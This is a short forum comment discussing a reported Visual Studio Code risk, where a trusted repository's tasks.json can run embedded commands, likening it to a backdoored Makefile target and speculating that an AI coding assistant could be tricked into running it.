Comment by fulafel

The article doesnt' claim it's executed straight up either ("can result") but it's pretty ambiguous:

> When the project is opened, Visual Studio Code prompts the user to trust the repository author. If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.

In the screenshot the task is named "node" - so it's a bit like embedding a malicious Makefile target as a backdoor.

Except harder to spot since it's in a obscure .vscode/somethingsomething json file. (And probably you can easily fool GH Copilot to run it)